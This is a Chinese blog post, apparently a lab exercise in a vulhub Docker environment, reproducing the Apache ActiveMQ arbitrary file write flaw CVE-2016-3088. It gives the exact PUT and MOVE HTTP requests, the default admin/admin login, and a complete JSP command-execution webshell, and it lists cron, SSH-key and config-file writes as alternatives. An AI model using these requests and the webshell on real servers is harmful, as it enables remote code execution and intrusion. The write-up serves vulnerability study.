ActiveMQ任意文件写入漏洞(CVE-2016-3088)

最新推荐文章于 2024-05-02 10:22:48 发布
最新推荐文章于 2024-05-02 10:22:48 发布
阅读量272 收藏
点赞数 1
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jie_a/article/details/119120193
版权

嘻嘻,狗哥下任务了,开始我的漏洞复现之旅

首先环境肯定是用vulhub创建

进入vulhub文件夹,找漏洞目录
运行漏洞环境:docker-compose up -d
访问http://your-ip:8161/看到web页面,说明环境已成功运行。

操作思路

本漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是fileserver支持写入文件(但不解析jsp),同时支持移动文件(MOVE请求)。所以,我们只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞。
三种方法:
1.写入webshell
2.写入cron或ssh key等文件
3.写入jar或jetty.xml等库和配置文件

操作

1.写入webshell
首先弱口令登陆 admin admin
查看ActiveMQ的绝对路径:
activemq.home /opt/activemq
上传webshell

PUT /fileserver/2.txt HTTP/1.1
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 120976

<%@ page import="java.util.*,java.io.*"%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr); 
                disr = dis.readLine(); 
                }
        }
%>
</pre>
</BODY></HTML>
---------------------------------------------------------
移动目录
MOVE /fileserver/2.txt HTTP/1.1
Destination: file:///opt/activemq/webapps/api/s.jsp
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0

然后用蚁剑连接webshell地址:http://121.4.162.152:8161/api/a.jsp
我这里出了点问题,我穿了个phpshell,我说咋连不上呢,有点尴尬
我这个jsp马很方便
在这里插入图片描述

直接有个框,最后发现蚁剑就连不上Jsp马 java没有eval这样的函数,溜溜球了。

盖世大宝剑a
关注
专栏目录
[ vulhub漏洞复现篇 ] ActiveMQ任意文件写入漏洞CVE-2016-3088
qq_51577576的博客
09-18 1267
[ vulhub漏洞复现篇 ] ActiveMQ任意文件写入漏洞CVE-2016-3088 ActiveMQweb控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。
vulhub靶场练习 CVE-2016-3088 —— ActiveMQ任意文件写入漏洞
雷根瓦尔德
11-08 1816
Vulhub靶场已经搭建完成,可以正式进行渗透测试的练习了。 本篇的内容是完成ActiveMQ任意文件写入漏洞CVE-2016-3088ActiveMQ介绍:Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 本篇我就先进行一次完整的实验过程,然后再按照...
ActiveMQ任意文件写入漏洞(版本在5.12.X前CVE-2016-3088
weixin_33953384的博客
10-11 381
ActiveMQ任意文件写入漏洞(版本在5.12.X前CVE-2016-3088) 查看docker的activemq版本命令:$ docker ps | grep activemq927860512db9 rmohr/activemq:5.15.4-alpine 从上面可以看到版本是activemq:5.15.4-alpine 在该漏洞修复版本之上,不用担心了。 ------...
ActiveMQ任意文件写入漏洞
weixin_47493074的博客
09-23 419
ActiveMQ任意文件写入漏洞
ActiveMQ任意文件写入漏洞CVE-2016-3088)复现
s40d1's Blog
10-17 815
title:ActiveMQ任意文件写入漏洞CVE-2016-3088)复现 ActiveMQ任意文件写入漏洞CVE-2016-3088) 文章目录title:ActiveMQ任意文件写入漏洞CVE-2016-3088)复现ActiveMQ任意文件写入漏洞CVE-2016-3088)一、环境搭建二、背景简述三、影响版本四、漏洞详情五、漏洞防御六、漏洞利用案例写入webshell 一、环境搭建 搭建及运行漏洞环境: docker-compose build docker-compose up -d .
ActiveMQ任意文件写入 (CVE-2016-3088)
nz9611的博客
07-16 445
背景: 8161端口为web控制台端口,本漏洞就出现在web控制台中。 ActiveMQweb控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。 fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELET...
ActiveMQ 任意文件写入漏洞CVE-2016-3088
qq_63963927的博客
10-23 250
3.漏洞产生原因:ActiveMQweb控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;登录admin账号:默认账号admin/admin,抓包进行修改,使用PUT方法上传文件ActiveMQ Web控制台分为三个应用程序:其中admin,api和fileserver,其中admin是管理员页面,api是界面,fileserver是用于存储文件的界面;默认的用户名/密码为admin/admin。
ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)复现实验报告
weixin_48400575的博客
01-23 3100
ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)复现实验报告
ActiveMQ任意文件写入漏洞 CVE-2016-3088-Vulnhub复现漏洞
m0_55563900的博客
07-02 270
ActiveMQ任意文件写入漏洞CVE-2016-3088) Vulnhub官方复现教程 https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2016-3088/README.zh-cn.md 背景简述 ActiveMQweb控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。 fil
CVE-2016-3088 ActiveMQ漏洞复现
zwj101010101010的博客
07-27 721
这个漏洞出现在fileserver应用中,原理就是fileserver支持写入文件但不解析jsp,同时支持MOVE请求移动文件,通过写入一个文件,然后利用移动请求移动到任意位置,导致任意文件写入漏洞。4、因为fileserver不解析,所以还需要使用MOVE请求来移动上传文件,移动的路径为/opt/activemq/webapps/api/,回显204成功。写入webshell,需要写在admin或api应用中,而这俩应用都需要登录才能访问。3、然后将GET修改为PUT,并在目录后加入想上传的数据包。...
ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)
swordheart的博客
01-18 1051
漏洞简介 ActiveMQ web控制台分为三个应用,admin、api和fileserver,其中admin为管理员页面,api为接口,fileserver为存放文件的接口;admin和api需要登录才可以使用,fileserver不需要登录。 fileserver 是一个 RESTful API 接口。我们可以通过GET、PUT、DELETE等HTTP请求来读写其中存储的文件。设计目的是为了弥补消息队列操作无法传输和存储二进制文件的缺陷,但后来发现: 它的使用率不高 文件操作容易出现漏洞 所以
ActiveMQ任意文件写入漏洞(CVE-2016-3088)
最新发布
m0_74402888的博客
05-02 1990
漏洞出现在 fileserver 应用中,漏洞原理是 fileserver 支持写入文件(但不解析 jsp),同时支持移动文件(MOVE 请求)。所以我们只需写入一个文件,然后使用 MOVE 请求将其移动到任意位置,造成任意文件写入漏洞写入文件方法写入 webshell写入 cron 或 ssh key 等文件写入 jar 或 jetty.xml 等库和配置文件
ActiveMQ 任意文件写入
weixin_51345872的博客
09-01 755
ActiveMQ的总结
ActiveMQ任意文件写入(CVE-2016-3088)
m0_65150886的博客
02-02 496
ActiveMQ在5.12.x~5.13.x版本中,默认关闭了fileserver这个应用(但是可以在conf/jetty.xml中开启);3.通过burp抓取http://ip:port页面的包,并修改get请求,通过put请求上传jsp马,文件不能以jsp命名,否则会上传失败。4.访问http://ip:port/fileserver/1.jsp,文件写入但是没有被执行。5.利用MOVE,将木马文件移动到api或者admin,我这边是移动到了api目录下。6.访问移动的jsp文件,并执行id命令。
ActiveMQ任意文件写入漏洞CVE-2016-3088)学习笔记
wswr的博客
03-21 179
总结:自己跟着这个老哥复现的时候,在第二部204后又500自己不太清除,反正最后没做出效果, 但是大概原理是懂了一点,大概就是版本低于5.12.x的Active MQ存在的问题,先用GET把1.txt文件传到fileserver文件下,但是因为fileserver不能解析jsp文件,所以用MOVE传到能够执行的地方(这里的意思应该是要先找路径,然后再找执行的api)。前面的操作验证了确实存在文件上传,后续的操作才是写webshell然后传到corntab文件(一个周期性执行其内部文件的东东),然后再监听即
CVE-2016-3088复现
07-28
CVE-2016-3088是一个存在于fileserver应用中的漏洞,其原理是fileserver支持写入文件但不解析jsp,同时支持MOVE请求移动文件,通过写入一个文件,然后利用移动请求移动到任意位置,导致任意文件写入漏洞。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值